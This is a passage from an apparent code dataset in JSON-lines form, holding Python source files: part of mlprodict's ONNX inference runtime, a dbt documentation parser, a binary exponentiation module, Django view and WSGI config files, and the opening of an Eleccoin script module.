suffix to add to new results\n :param param_name: name of the parameter to add\n (by default the result name), it can be a function\n `param_name(reult_name) -> parameter_name`\n :param node_type: type of the new node\n :param domain: domain the new node\n :param domain_opset: opset for *domain*\n :return: outputs as dictionary\n and the onnx graph with new nodes\n\n The following example shows how to use it.\n\n .. 
gdot::\n :script: DOT-SECTION\n\n from sklearn.linear_model import LinearRegression\n from sklearn.datasets import load_iris\n from mlprodict.onnxrt import OnnxInference\n import numpy\n\n iris = load_iris()\n X = iris.data[:, :2]\n y = iris.target\n lr = LinearRegression()\n lr.fit(X, y)\n\n from mlprodict.onnx_conv import to_onnx\n model_onnx = to_onnx(lr, X.astype(numpy.float32))\n oinf = OnnxInference(model_onnx, inplace=False)\n\n model_onnx_debug = oinf.run2onnx({'X': X[:3].astype(numpy.float32)})\n oinf_debug = OnnxInference(model_onnx_debug[1])\n\n print(\"DOT-SECTION\", oinf_debug.to_dot())\n\n .. versionadded:: 0.7\n \"\"\"\n intermediate = self.run(inputs, verbose=verbose, fLOG=fLOG,\n intermediate=True)\n for name in self.input_names:\n del intermediate[name]\n new_onx = insert_results_into_onnx(\n self.obj, intermediate, as_parameter=as_parameter,\n suffix=suffix, param_name=param_name, node_type=node_type,\n domain=domain, domain_opset=domain_opset)\n return intermediate, new_onx\n\n def display_sequence(self, verbose=1):\n \"\"\"\n Shows the sequence of nodes to run if ``runtime=='python'``.\n \"\"\"\n rows = []\n rows.append(\"#node: {}\".format(len(self.sequence_)))\n for i, node in enumerate(self.sequence_):\n if verbose >= 1:\n rows.append(\"{}: {}\".format(i, str(node)))\n return \"\\n\".join(rows)\n\n def _run_sequence_runtime(self, inputs, clean_right_away=False,\n intermediate=False, verbose=0, node_time=False,\n overwrite_types=None, yield_ops=None,\n fLOG=None):\n if overwrite_types is not None:\n raise NotImplementedError( # pragma: no cover\n \"overwrite_types != None not implemented.\")\n if clean_right_away:\n raise NotImplementedError( # pragma: no cover\n \"clean_right_away=true not implemented.\")\n\n if node_time:\n mtime = []\n if verbose >= 1 and fLOG is not None:\n printed = set()\n\n if hasattr(self, \"_values_init\"):\n values = self._values_init.copy() # pylint: disable=E0203\n else:\n values = [None] * len(self._global_index)\n if verbose >= 1 and fLOG is not None:\n for k, v in self.inits_.items():\n values[self._global_index[k]] = v['value']\n if verbose < 3:\n fLOG(\"+ki='{}': {} (dtype={} min={} max={})\".format(\n k, v['value'].shape, v['value'].dtype,\n numpy_min(v['value']), numpy_max(v['value'])))\n else:\n fLOG(\"+ki='{}': {} (dtype={} min={} max={}\\n{}\".format(\n k, v['value'].shape, v['value'].dtype,\n numpy_min(v['value']), numpy_max(v['value']),\n v['value']))\n printed.add(k)\n else:\n for k, v in self.inits_.items():\n values[self._global_index[k]] = v['value']\n # stores the array to skip initialing a second time\n if verbose == 0 or fLOG is None:\n self._values_init = values.copy()\n\n for name, value in inputs.items():\n values[self._global_index[name]] = value\n\n if verbose == 0 or fLOG is None:\n if node_time:\n for i, node in enumerate(self.sequence_):\n if yield_ops is not None and node.onnx_node.op_type == 'YieldOp':\n out = node.onnx_node.output[0]\n if out in yield_ops:\n values[out] = yield_ops[out]\n continue\n raise RuntimeError( # pragma: no cover\n \"YieldOp output %r could not be found in \"\n \"yield_ops: %r (node=%r).\" % (\n out, list(sorted(yield_ops)), node.onnx_node))\n t = perf_counter()\n node.run(values)\n t2 = perf_counter()\n mtime.append(dict(i=i, name=node.onnx_node.name,\n op_type=node.onnx_node.op_type,\n time=t2 - t))\n else:\n for node in self.sequence_:\n node.run(values)\n else:\n def dispsimple(arr):\n if hasattr(arr, 'shape'):\n if len(arr.shape) <= 1:\n threshold = 8\n else:\n threshold = min(\n 
50, min(50 // max(arr.shape[1], 1), 8) * arr.shape[1])\n if hasattr(arr, 'todense'):\n fLOG( # pragma: no cover\n numpy.array2string(arr.todense(), max_line_width=120,\n suppress_small=True, threshold=threshold))\n else:\n fLOG(numpy.array2string(arr, max_line_width=120,\n suppress_small=True,\n threshold=threshold))\n else: # pragma: no cover\n s = str(arr)\n if len(s) > 50:\n s = s[:50] + \"...\"\n fLOG(s)\n\n if verbose >= 2:\n for k in sorted(self._global_index):\n if values[self._global_index[k]] is None:\n continue\n obj = values[self._global_index[k]]\n if k not in printed:\n printed.add(k)\n if hasattr(obj, 'shape'):\n fLOG(\"-kv='{}' shape={} dtype={} min={} max={}{}\".format(\n k, obj.shape, obj.dtype, numpy_min(obj),\n numpy_max(obj),\n ' (sparse)' if isinstance(obj, coo_matrix) else ''))\n elif (isinstance(obj, list) and len(obj) > 0 and\n not isinstance(obj[0], dict)): # pragma: no cover\n fLOG(\"-kv='{}' list len={}\".format(k, len(obj)))\n if verbose >= 3 and len(obj) > 0:\n fLOG(\"first={} last={}\".format(\n obj[0], obj[-1]))\n else: # pragma: no cover\n fLOG(\"-kv='{}' type={}\".format(k, type(obj)))\n\n keys = set(k for k in range(len(values)) if values[k] is not None)\n if verbose >= 1:\n fLOG(\"-- OnnxInference: run {} nodes\".format(len(self.sequence_)))\n for i, node in enumerate(self.sequence_):\n if verbose >= 1:\n fLOG(node)\n if yield_ops is not None and node.onnx_node.op_type == 'YieldOp':\n out = node.onnx_node.output[0]\n if out in yield_ops:\n fLOG(\"+yo=%r\" % out)\n values[node.outputs_indices[0]] = yield_ops[out]\n else:\n raise RuntimeError( # pragma: no cover\n \"YieldOp output %r could not be found in \"\n \"yield_ops: %r (node=%r).\" % (\n out, list(sorted(yield_ops)), node.onnx_node))\n elif node_time:\n t = perf_counter()\n node.run(values)\n t2 = perf_counter()\n mtime.append(dict(i=i, name=node.onnx_node.name,\n op_type=node.onnx_node.op_type,\n time=t2 - t))\n else:\n node.run(values)\n added = 0\n for k in range(len(values)): # pylint: disable=C0200\n if values[k] is None:\n continue\n if k not in keys and k not in printed:\n added += 1\n printed.add(k)\n name = list(\n name for name in self._global_index # pylint: disable=C0206\n if self._global_index[name] == k)\n if isinstance(values[k], (numpy.ndarray, coo_matrix)):\n name = name[0]\n mini = numpy_min(values[k])\n maxi = numpy_max(values[k])\n fLOG(\"+kr{}'{}': {} (dtype={} min={} max={}{})\".format(\n \"=\" if len(values[k].shape) == 0 or min(\n values[k].shape) > 0 else \"*\",\n name, values[k].shape, values[k].dtype,\n mini, maxi,\n ' sparse' if isinstance(values[k], coo_matrix) else ''))\n if verbose >= 3:\n dispsimple(values[k])\n else:\n fLOG(\"+kr='{}': {}\".format(\n name, type(values[k])))\n if verbose >= 3: # pragma: no cover\n dispsimple(values[k])\n if added == 0:\n fLOG(\"? 
no new result\") # pragma: no cover\n\n if intermediate:\n values = [(v, k, values[v]) for k, v in self._global_index.items()]\n values.sort()\n values = OrderedDict((k, v) for _, k, v in values)\n return (values, mtime) if node_time else values\n\n try:\n res = {k: values[self._global_index[k]] for k in self.outputs_}\n except KeyError as e: # pragma: no cover\n raise RuntimeError(\"Unable to find one output [{}]\\n in [{}]\"\n \".\".format(\", \".join(sorted(self.outputs_)),\n \", \".join(sorted(values)))) from e\n return (res, mtime) if node_time else res\n\n def build_intermediate(self, outputs=None, verbose=0, overwrite_types=None,\n fLOG=None):\n \"\"\"\n Builds every possible :epkg:`ONNX` file\n which computes one specific intermediate output\n from the inputs.\n\n :param outputs: subsets of outputs to get,\n None to get all outputs,\n :param overwrite_types: shape inference does not work all the time,\n this allows to force types when building intermediate\n results, see @see fn select_model_inputs_outputs\n :param verbose: displays intermediate information\n :param fLOG: logging function\n :return: :epkg:`*py:collections:OrderedDict`\n\n .. versionchanged: 0.6\n \"\"\"\n if verbose > 0:\n fLOG('[build_intermediate] BEGIN.')\n if outputs is not None:\n if isinstance(outputs, str):\n outputs = [outputs]\n if not isinstance(outputs, set):\n outputs = set(outputs)\n ord = OrderedDict()\n for output in enumerate_model_node_outputs(self.obj, order=True):\n if outputs is not None and output not in outputs:\n continue\n subonx = select_model_inputs_outputs(\n self.obj, outputs=output, infer_shapes=True,\n overwrite=overwrite_types)\n subonx = onnx_remove_node_unused(subonx)\n if verbose > 0:\n fLOG( # pragma: no cover\n '[build_intermediate] + {}'.format(output))\n ord[output] = OnnxInference(subonx, runtime=self.runtime,\n skip_run=self.skip_run,\n runtime_options=self.runtime_options,\n inplace=self.inplace,\n input_inplace=self.input_inplace)\n if verbose > 0:\n fLOG( # pragma: no cover\n '[build_intermediate] END.')\n return ord\n\n def _run_whole_runtime(self, inputs, clean_right_away=False,\n intermediate=False, verbose=0, node_time=False,\n overwrite_types=None, yield_ops=None, fLOG=None):\n # node_time is unused\n if clean_right_away:\n raise RuntimeError( # pragma: no cover\n \"clean_right_away=true does not work with this runtime.\")\n if intermediate:\n if hasattr(self, \"intermediate_onnx_inference_\"):\n inter_run = self.intermediate_onnx_inference_ # pylint: disable=E0203\n else:\n if verbose > 0:\n fLOG( # pragma: no cover\n \"-- OnnxInference: build intermediate\")\n inter_run = self.build_intermediate(\n verbose=verbose, fLOG=fLOG, overwrite_types=overwrite_types)\n self.intermediate_onnx_inference_ = inter_run\n graph = self.to_sequence()\n self.inits_ = graph['inits']\n\n if verbose >= 1:\n fLOG( # pragma: no cover\n \"-- OnnxInference: run {} nodes\".format(\n len(self.intermediate_onnx_inference_)))\n values = OrderedDict(inputs)\n for k, v in self.inits_.items():\n values[k] = v['value']\n if verbose >= 2: # pragma: no cover\n for k in sorted(values):\n fLOG(\"-k='{}' shape={} dtype={}\".format(\n k, values[k].shape, values[k].dtype))\n for node, oinf in self.intermediate_onnx_inference_.items():\n if verbose >= 4: # pragma: no cover\n fLOG('[intermediate] %r' % node)\n if verbose >= 5: # pragma: no cover\n fLOG(oinf.obj)\n if yield_ops is not None and node.onnx_node.op_type == 'YieldOp':\n out = node.onnx_node.output[0]\n if out in yield_ops:\n values[out] = 
yield_ops[out]\n continue\n raise RuntimeError( # pragma: no cover\n \"YieldOp output %r could not be found in \"\n \"yield_ops: %r (node=%r).\" % (\n out, list(sorted(yield_ops)), node.onnx_node))\n output = oinf.run(inputs)[node]\n values[node] = output\n if verbose >= 1:\n if verbose >= 4: # pragma: no cover\n for k, v in inputs.items():\n if isinstance(output, numpy.ndarray):\n fLOG(\"-i='{}': {} (dtype={}) {}\".format(\n k, v.shape, v.dtype, v.ravel().tolist()))\n else:\n fLOG(\"-i='{}': {} (dtype={}) - ?\".format(\n k, v.shape, v.dtype))\n if isinstance(output, numpy.ndarray):\n fLOG(\"+k='{}': {} (dtype={})\".format(\n node, output.shape, output.dtype))\n if verbose >= 2: # pragma: no cover\n fLOG(output)\n else:\n fLOG(\"+k='{}': {}\".format( # pragma: no cover\n node, type(output)))\n if verbose >= 2: # pragma: no cover\n fLOG(output)\n return values\n\n if verbose != 0:\n warnings.warn(\n \"verbose option not implemented if runtime is 'onnxruntime1'\")\n res = self._whole.run(inputs)\n return {k: v for k, v in zip(self.outputs_, res)}\n\n def __getitem__(self, item):\n \"\"\"\n Returns the ONNX verions of a node.\n \"\"\"\n if isinstance(item, tuple):\n node_name, att_name = item\n else:\n node_name = item\n att_name = None\n\n node_ = None\n for node in self.obj.graph.node:\n if node.name == node_name:\n node_ = node\n break\n\n if node_ is None:\n raise IndexError( # pragma: no cover\n \"Unable to get node name '{}'.\\n{}\".format(\n node_name, \"\\n\".join(node.name for node in self.obj.graph.node)))\n\n if att_name is None:\n return node_\n\n for att in node_.attribute:\n if att.name == att_name:\n return att\n\n raise IndexError( # pragma: no cover\n \"Unable to find attribute '{}' from node \"\n \"'{}'.\".format(att_name, node_name))\n\n def switch_initializers_dtype(self, model=None,\n dtype_in=numpy.float32,\n dtype_out=numpy.float64):\n \"\"\"\n Switches all initializers to ``numpy.float64``. If *model*\n is None, a simple cast is done. 
Otherwise, the function assumes\n the model is a :epkg:`scikit-learn` pipeline.\n This only works if the runtime is ``'python'``.\n\n @param model :epkg:`scikit-learn` model or None\n @param dtype_in previous type\n @param dtype_out next type\n @return done operations\n \"\"\"\n from ..onnx_tools.optim.sklearn_helper import enumerate_fitted_arrays, pairwise_array_distances\n\n if self.runtime != 'python': # pragma: no cover\n raise RuntimeError(\"Initializers can be casted only if the \"\n \"runtime is 'python' not '{}'.\".format(self.runtime))\n\n if hasattr(self, '_values_init'):\n del self._values_init\n\n # first pass: simple cast\n done = []\n initializer = self.inits_\n for k, v in initializer.items():\n if isinstance(v['value'], numpy.ndarray):\n if v['value'].dtype == dtype_in:\n v['value'] = v['value'].astype(dtype_out)\n done.append((\"pass1\", \"+\", \"init\", k, v['value']))\n else:\n done.append((\"pass1\", \"-\", \"init\", k,\n v['value'])) # pragma: no cover\n for k, v in self.graph_['nodes'].items():\n res = v.switch_initializers_dtype(dtype_in=dtype_in,\n dtype_out=dtype_out)\n for r in res:\n done.append((\"pass1\", \"node\", k) + r)\n for k, v in self.graph_['intermediate'].items():\n if v is None:\n continue\n res = v.switch_initializers_dtype(dtype_in=dtype_in,\n dtype_out=dtype_out)\n for r in res:\n done.append((\"pass1\", \"sub\", k) + r)\n\n if model is not None:\n # Second pass, we compare all arrays from the model\n # to the arrays in the converted models.\n def dist(a):\n cast = a.astype(dtype_in).astype(dtype_out)\n d = pairwise_array_distances([cast], [a])[0, 0]\n return d\n\n done_ = [(c, c[-1]) for c in done]\n moda_ = [(a, a[-2][-1]) for a in enumerate_fitted_arrays(model)\n if dist(a[-2][-1]) > 0]\n aconv = [_[-1] for _ in done_]\n amoda = [_[-1] for _ in moda_]\n distances = pairwise_array_distances(aconv, amoda)\n\n for i in range(distances.shape[0]):\n j = numpy.argmin(distances[i])\n d = distances[i, j]\n if d < 0.1:\n numpy.copyto(aconv[i], amoda[j])\n done.append((\"pass2\", d) + done_[i][0])\n\n return done\n\n def _set_shape_inference_runtime(self):\n \"\"\"\n Set shapes based on shape inference\n relying on the runtime.\n The values are stored in every node.\n \"\"\"\n if not hasattr(self, 'sequence_') or not hasattr(self, 'inputs_'):\n raise RuntimeError( # pragma: no cover\n \"This method only works if the runtime is 'python' not \"\n \"'{}'.\".format(self.runtime))\n values = OrderedDict()\n for k, v in self.inputs_.items():\n # The function assumes the first dimension is unknown\n # and is the batch size.\n try:\n values[k] = ShapeObject(v, use_n1=True, name=k)\n except TypeError as e: # pragma: no cover\n raise TypeError(\n \"Unable to guess shape for %r (shape=%r).\" % (k, v)) from e\n\n impossible = False\n for k, v in self.statics_.items():\n # static inputs should be known.\n if k not in values:\n try:\n values[k] = ShapeObject(v)\n except TypeError:\n # default value is wrong\n impossible = True\n values[k] = None\n\n for k, v in self.inits_.items():\n values[k] = ShapeObject(v['value'], name=k)\n last = None\n for i, node in enumerate(self.sequence_):\n try:\n s = node._set_shape_inference_runtime(values)\n last = s\n except (IndexError, TypeError, KeyError,\n AttributeError) as e: # pragma: no cover\n rows = []\n if last is not None:\n for k, v in last.items():\n rows.append(\"{}: {}\".format(k, v))\n for k in range(i + 1):\n rows.append(\"{} --> {}\".format(k, self.sequence_[k]))\n if not impossible:\n raise RuntimeError(\"Unable to 
infer shape of node {}\\n{}\".format(\n i, '\\n'.join(rows))) from e\n return values\n\n def infer_shapes(self):\n \"\"\"\n Computes expected shapes.\n\n :return: dictionary of shapes\n \"\"\"\n return self._set_shape_inference_runtime()\n\n def _set_type_inference_runtime(self):\n \"\"\"\n Set types based on type inference\n relying on the runtime.\n The values are stored in every node.\n \"\"\"\n if not hasattr(self, 'sequence_') or not hasattr(self, 'inputs_'):\n raise RuntimeError( # pragma: no cover\n \"This method only works if the runtime is 'python' not \"\n \"'{}'.\".format(self.runtime))\n values = OrderedDict()\n for k, v in self.statics_.items():\n values[k] = None\n for k, v in self.inputs_.items():\n # The function assumes the first dimension is unknown\n # and is the batch size.\n if isinstance(v['type']['elem'], dict):\n # sequence\n values[k] = SequenceType()\n else:\n values[k] = guess_numpy_type_from_string(v['type']['elem'])\n for k, v in self.inits_.items():\n values[k] = v['value'].dtype\n last = None\n for i, node in enumerate(self.sequence_):\n try:\n s = node._set_type_inference_runtime(values)\n last = s\n except IndexError as e: # pragma: no cover\n rows = []\n if last is not None:\n for k, v in last.items():\n rows.append(\"{}: {}\".format(k, v))\n for k in range(i + 1):\n rows.append(\"{} --> {}\".format(k, self.sequence_[k]))\n raise RuntimeError(\"Unable to infer type of node {}\\n{}\".format(\n i, '\\n'.join(rows))) from e\n return values\n\n def infer_types(self):\n \"\"\"\n Computes expected shapes.\n\n :return: dictionary of types\n \"\"\"\n return self._set_type_inference_runtime()\n\n def _set_size_inference_runtime(self, inputs, context=None):\n \"\"\"\n Set sizes allocated during inference\n relying on the runtime.\n The values are stored in every node.\n \"\"\"\n if not hasattr(self, 'sequence_') or not hasattr(self, 'inputs_'):\n raise RuntimeError( # pragma: no cover\n \"This method only works if the runtime is 'python' not \"\n \"'{}'.\".format(self.runtime))\n values = OrderedDict()\n for k, v in self.statics_.items():\n if context is None:\n raise RuntimeError( # pragma: no cover\n \"static variable but context is None.\")\n values[k] = context[k]\n for k, v in self.inits_.items():\n values[k] = v['value']\n for k, v in self.inputs_.items():\n if k in inputs:\n values[k] = inputs[k]\n\n last = None\n for i, node in enumerate(self.sequence_):\n try:\n s = node._set_size_inference_runtime(values)\n last = s\n except IndexError as e: # pragma: no cover\n rows = []\n if last is not None:\n for k, v in last.items():\n rows.append(\"{}: {}\".format(k, v))\n for k in range(i + 1):\n rows.append(\"{} --> {}\".format(k, self.sequence_[k]))\n raise RuntimeError(\"Unable to infer size of node {}\\n{}\".format(\n i, '\\n'.join(rows))) from e\n return values\n\n def infer_sizes(self, inputs, context=None):\n \"\"\"\n Computes expected sizes.\n\n :param inputs: inputs as a dictionary\n :return: dictionary of dictionary of sizes\n \"\"\"\n res = self._set_size_inference_runtime(inputs, context=context)\n return {k: v for k, v in res.items() if k.startswith('#')}\n\n def _guess_inplace(self, input_inplace=False):\n \"\"\"\n Looks into every node of the graph to see\n if there is a way to do the computation\n inplace. 
By default (*input_inplace=False*),\n the function assumes inputs cannot be modified\n so the first node cannot do inplace computation.\n This function only works with the python runtime.\n\n @param input_inplace the computation is allowed\n to overwrite the input\n\n This function checks that one node is used only\n once and then can be modified by the next node.\n Nodes `A`, `C` can be overwritten by the computation.\n Node `B` cannot as it is used by two nodes.\n\n .. blockdiag::\n\n diagram {\n A -> B -> C -> E;\n B -> D;\n }\n\n It does not handle specific case such node `B` being\n overwritten by node `C` but without changing its shape\n and node `D` only needs the shape of `B`. Then `B` could\n be overwritten as well.\n \"\"\"\n forbid = {}\n values = OrderedDict()\n for k in self.statics_:\n values[k] = dict(inplace=False, to=[], fr=[])\n for k in self.inputs_:\n values[k] = dict(inplace=input_inplace, to=[], fr=[])\n for k in self.inits_:\n values[k] = dict(inplace=False, to=[], fr=[])\n for node in self.sequence_:\n for n in node.inputs:\n values[n]['to'].append(node)\n for n in node.outputs:\n if node.op_type == 'Constant':\n # We cannot modify constant.\n forbid[n] = node\n if n not in values:\n values[n] = dict(inplace=None, to=[], fr=[])\n values[n]['fr'].append(node)\n\n # checks the number of outputs\n outputs = set(self.output_names)\n modif = 1\n while modif > 0:\n modif = 0\n for n, v in values.items():\n if v['inplace'] is not None:\n continue\n if n in forbid:\n continue\n if len(v['to']) == 1:\n v['inplace'] = True\n modif += 1\n\n # convey the information to every node\n inplaces = {}\n for n, v in values.items():\n if v['inplace']:\n inplaces[n] = v\n for node in v['to']:\n if n in outputs:\n continue\n node.enable_inplace_compute(n)\n\n return inplaces\n\n def _build_compile_run(self, debug=False):\n \"\"\"\n Rewrite the run function in python,\n compiles it, and adds it as a method.\n\n @param debug insert debugging code\n @return method name, callable object\n\n .. exref::\n :title: Run a model with runtime 'python_compiled'\n\n The following code trains a model and compute\n the predictions with runtime ``'python_compiled'``.\n It converts the onnx graph into a python function\n which calls every operator. Its code is printed\n below.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n import numpy\n from sklearn.datasets import load_iris\n from sklearn.model_selection import train_test_split\n from sklearn.ensemble import AdaBoostClassifier\n from sklearn.tree import DecisionTreeClassifier\n from skl2onnx import to_onnx\n from mlprodict.onnxrt import OnnxInference\n\n iris = load_iris()\n X, y = iris.data, iris.target\n X_train, X_test, y_train, __ = train_test_split(X, y, random_state=11)\n y_train = y_train.astype(numpy.float32)\n clr = AdaBoostClassifier(\n base_estimator=DecisionTreeClassifier(max_depth=3),\n n_estimators=3)\n clr.fit(X_train, y_train)\n\n model_def = to_onnx(clr, X_train.astype(numpy.float32),\n target_opset=12)\n\n oinf2 = OnnxInference(model_def, runtime='python_compiled')\n print(oinf2.run({'X': X_test[:5]}))\n\n # prints out the python function equivalent\n # to the onnx graph\n print(oinf2)\n \"\"\"\n def clean_name(name):\n return name.replace(\":\", \"_\").replace('.', '_').replace('/', '_')\n\n # inits\n inputs = self.input_names\n code = ['def compiled_run(dict_inputs, yield_ops=None):']\n code.append(\" if yield_ops is not None:\")\n code.append(\n \" raise NotImplementedError('yields_ops should be None.')\")\n if debug:\n code.append(\" printed = {}\")\n\n context = {}\n\n # static variables\n for k in sorted(self.statics_):\n code.append(\" # static: {0}\".format(k))\n code.append(\" {0} = dict_inputs['{1}']\".format(\n clean_name(k), k))\n if debug:\n code.append(\n \" debug_print('i.{0}', {1}, printed)\".format(\n clean_name(k), k))\n\n # initializers\n for k, v in sorted(self.inits_.items()):\n if k.startswith(\"_OPT_\"):\n raise RuntimeError( # pragma: no cover\n \"The runtime cannot handle any constant name \"\n \"starting with '_OPT_': '{}'.\".format(k))\n if k in inputs:\n context[\"_OPT_\" + clean_name(k)] = v['value']\n code.append(\" # init: _OPT_{0} ({1})\".format(\n clean_name(k), k))\n if debug:\n code.append(\n \" debug_print('c.[_OPT_{0}]', _OPT_{1}, printed)\".format(\n clean_name(k), k))\n else:\n context[clean_name(k)] = v['value']\n code.append(\" # init: {0} ({1})\".format(\n clean_name(k), k))\n if debug:\n code.append(\n \" debug_print('c.[{0}]', {1}, printed)\".format(\n clean_name(k), k))\n\n # method signature\n code.append(\" # inputs\")\n for inp in inputs:\n if '_OPT_' + inp in context:\n # optional inputs\n code.append(\n \" {0} = dict_inputs.get('{1}', _OPT_{0})\".format(\n clean_name(inp), inp))\n else:\n code.append(\" {0} = dict_inputs['{1}']\".format(\n clean_name(inp), inp))\n if debug:\n code.append(\n \" debug_print('i.{0}', {1}, printed)\".format(\n clean_name(inp), inp))\n\n # code\n for i, node in enumerate(self.sequence_):\n name = \"n{}_{}\".format(i, node.ops_.__class__.__name__.lower())\n context[name] = node.ops_._run\n if (node.ops_.__class__.__name__ == 'Loop' and\n node.ops_.need_context()):\n # Adding context.\n ctx = \"{%s}\" % \", \".join(\n \"'%s': %s\" % (n, n) for n in node.ops_.additional_inputs)\n code.append(' ({1}, ) = {2}({0}, context={3})'.format(\n ', '.join(map(clean_name, node.inputs)),\n ', '.join(map(clean_name, node.outputs)),\n name, ctx))\n else:\n code.append(' ({1}, ) = {2}({0})'.format(\n ', '.join(map(clean_name, node.inputs)),\n ', '.join(map(clean_name, node.outputs)),\n name))\n if debug:\n code.append(\" print('''# {}''')\".format(code[-1][4:]))\n for o in node.outputs:\n code.append(\n \" debug_print('o.{0}', {1}, printed)\".format(\n clean_name(o), o))\n\n # return\n code.append(' return {')\n for 
out in self.output_names:\n code.append(\" '{1}': {0},\".format(\n clean_name(out), out))\n code.append(' }')\n final_code = '\\n'.join(code)\n\n # compile the outcome\n context['self'] = self\n try:\n obj = compile(final_code, \"<string>\", 'exec')\n except SyntaxError as e: # pragma: no cover\n raise SyntaxError(\n \"Unable to compile\\n#####\\n{}\".format(final_code)) from e\n fcts_obj = [_ for _ in obj.co_consts\n if _ is not None and not isinstance(_, (bool, str, int))]\n fct = make_callable(\n \"compiled_run\", fcts_obj[0], final_code, context, debug)\n\n # end\n return \"compiled_run\", fct, final_code\n\n def reduce_size(self, pickable=False):\n \"\"\"\n Reduces the memory footprint as much as possible.\n\n @param pickable keeps a pickle object?\n \"\"\"\n import gc\n del self.graph_\n if not pickable:\n del self.obj\n if self.runtime in ('python_compiled', 'python_compiled_debug'):\n del self.sequence_\n gc.collect()\n\n def get_profiling(self, as_df=False):\n \"\"\"\n Returns the profiling after a couple of execution.\n\n :param as_df: return the results as a dataframe (True)\n :return: dataframe or list of dictionaries\n\n .. versionadded:: 0.6\n \"\"\"\n if (self.runtime_options is None or\n not self.runtime_options.get('enable_profiling', False)):\n raise RuntimeError(\n \"Profiling is available if options 'enable_profiling' \"\n \"is set to true in 'runtime_options' but is %r.\" % self.runtime_options)\n prof = None\n if hasattr(self, '_whole'):\n prof = self._whole.get_profiling()\n if prof is None:\n raise NotImplementedError( # pragma: no cover\n \"profiling is only implemented for runtime 'onnxruntime1'.\")\n if as_df:\n import pandas\n return pandas.DataFrame(prof)\n return prof\n\n def get_execution_order(self):\n \"\"\"\n This function returns a dictionary `{(kind, name): (order, op)}`,\n *name* can be a node name or a result name. In that case,\n it gets the execution order than the node which created it.\n The function returns None if the order is not available\n (the selected runtime does not return it). *kind* is either\n `'node'` or `'node'`. If two nodes have the same name,\n returned order is the last one. Initializers gets an execution\n order equal to -1, inputs to 0, all others results are >= 1.\n\n .. 
versionadded:: 0.7\n \"\"\"\n if not hasattr(self, \"sequence_\"):\n return None\n\n res = {}\n for k, v in self.inits_.items():\n res['res', k] = (-1, v)\n for name, shape in self.input_names_shapes:\n res['res', name] = (0, shape)\n\n for i, node in enumerate(self.sequence_):\n key = ('node', node.onnx_node.name)\n res[key] = (i + 1, node)\n for out in node.onnx_node.output:\n key = ('res', out)\n if key in res:\n raise RuntimeError( # pragma: no cover\n \"Output %r of node name %r already registered.\"\n \"\" % (out, node.onnx_node.name))\n res[key] = (i + 1, None)\n\n return res\n"} {"ext": "py", "sha": "1a30fb40600d4666bd50a5b75878d708873ffa34", "content": "from typing import Iterable\n\nimport re\n\nfrom dbt.clients.jinja import get_rendered\nfrom dbt.contracts.graph.parsed import ParsedDocumentation\nfrom dbt.node_types import NodeType\nfrom dbt.parser.base import Parser\nfrom dbt.parser.search import (\n BlockContents, FileBlock, BlockSearcher\n)\n\n\nSHOULD_PARSE_RE = re.compile(r'{[{%]')\n\n\nclass DocumentationParser(Parser[ParsedDocumentation]):\n @property\n def resource_type(self) -> NodeType:\n return NodeType.Documentation\n\n @classmethod\n def get_compiled_path(cls, block: FileBlock):\n return block.path.relative_path\n\n def generate_unique_id(self, resource_name: str) -> str:\n # because docs are in their own graph namespace, node type doesn't\n # need to be part of the unique ID.\n return '{}.{}'.format(self.project.project_name, resource_name)\n\n def parse_block(\n self, block: BlockContents\n ) -> Iterable[ParsedDocumentation]:\n unique_id = self.generate_unique_id(block.name)\n contents = get_rendered(block.contents, {}).strip()\n\n doc = ParsedDocumentation(\n root_path=self.project.project_root,\n path=block.file.path.relative_path,\n original_file_path=block.path.original_file_path,\n package_name=self.project.project_name,\n unique_id=unique_id,\n name=block.name,\n block_contents=contents,\n )\n return [doc]\n\n def parse_file(self, file_block: FileBlock):\n searcher: Iterable[BlockContents] = BlockSearcher(\n source=[file_block],\n allowed_blocks={'docs'},\n source_tag_factory=BlockContents,\n )\n for block in searcher:\n for parsed in self.parse_block(block):\n self.manifest.add_doc(file_block.file, parsed)\n"} {"ext": "py", "sha": "1a30fb8fd266cca93f016ed29de1fa7e5726d0c1", "content": "\"\"\"\n* Binary Exponentiation for Powers\n* This is a method to find a^b in a time complexity of O(log b)\n* This is one of the most commonly used methods of finding powers.\n* Also useful in cases where solution to (a^b)%c is required,\n* where a,b,c can be numbers over the computers calculation limits.\n* Done using iteration, can also be done using recursion\n\n* @author chinmoy159\n* @version 1.0 dated 10/08/2017\n\"\"\"\n\n\ndef b_expo(a, b):\n res = 1\n while b > 0:\n if b&1:\n res *= a\n\n a *= a\n b >>= 1\n\n return res\n\n\ndef b_expo_mod(a, b, c):\n res = 1\n while b > 0:\n if b&1:\n res = ((res%c) * (a%c)) % c\n\n a *= a\n b >>= 1\n\n return res\n\n\"\"\"\n* Wondering how this method works !\n* It's pretty simple.\n* Let's say you need to calculate a ^ b\n* RULE 1 : a ^ b = (a*a) ^ (b/2) ---- example : 4 ^ 4 = (4*4) ^ (4/2) = 16 ^ 2\n* RULE 2 : IF b is ODD, then ---- a ^ b = a * (a ^ (b - 1)) :: where (b - 1) is even.\n* Once b is even, repeat the process to get a ^ b\n* Repeat the process till b = 1 OR b = 0, because a^1 = a AND a^0 = 1\n*\n* As far as the modulo is concerned,\n* the fact : (a*b) % c = ((a%c) * (b%c)) % c\n* Now apply RULE 1 OR 2 whichever is 
required.\n\"\"\"\n"} {"ext": "py", "sha": "1a30fde460e2706385b779e11d788fa9d0704901", "content": "from django.views.generic import TemplateView\n\n\nclass FrontEndView(TemplateView):\n template_name = 'home.html'\n"} {"ext": "py", "sha": "1a30fe1917e267e3092bbbdc0f86dec8f73778cb", "content": "\"\"\"\nWSGI config for testappauto614_dev_23545 project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/\n\"\"\"\n\nimport os\n\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'testappauto614_dev_23545.settings')\n\napplication = get_wsgi_application()\n"} {"ext": "py", "sha": "1a30ff06ccd24823958ce627b5d8cdaae7ac1a7b", "content": "#!/usr/bin/env python3\n# Copyright (c) 2020-2021 The Eleccoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Functionality to build scripts, as well as signature hash functions.\n\nThis file is modified from python-eleccoinlib.\n\"\"\"\n\nfrom collections import namedtuple\nimport hashlib\nimport struct\nimport unittest\nfrom typing import List, Dict\n\nfrom .key import TaggedHash, 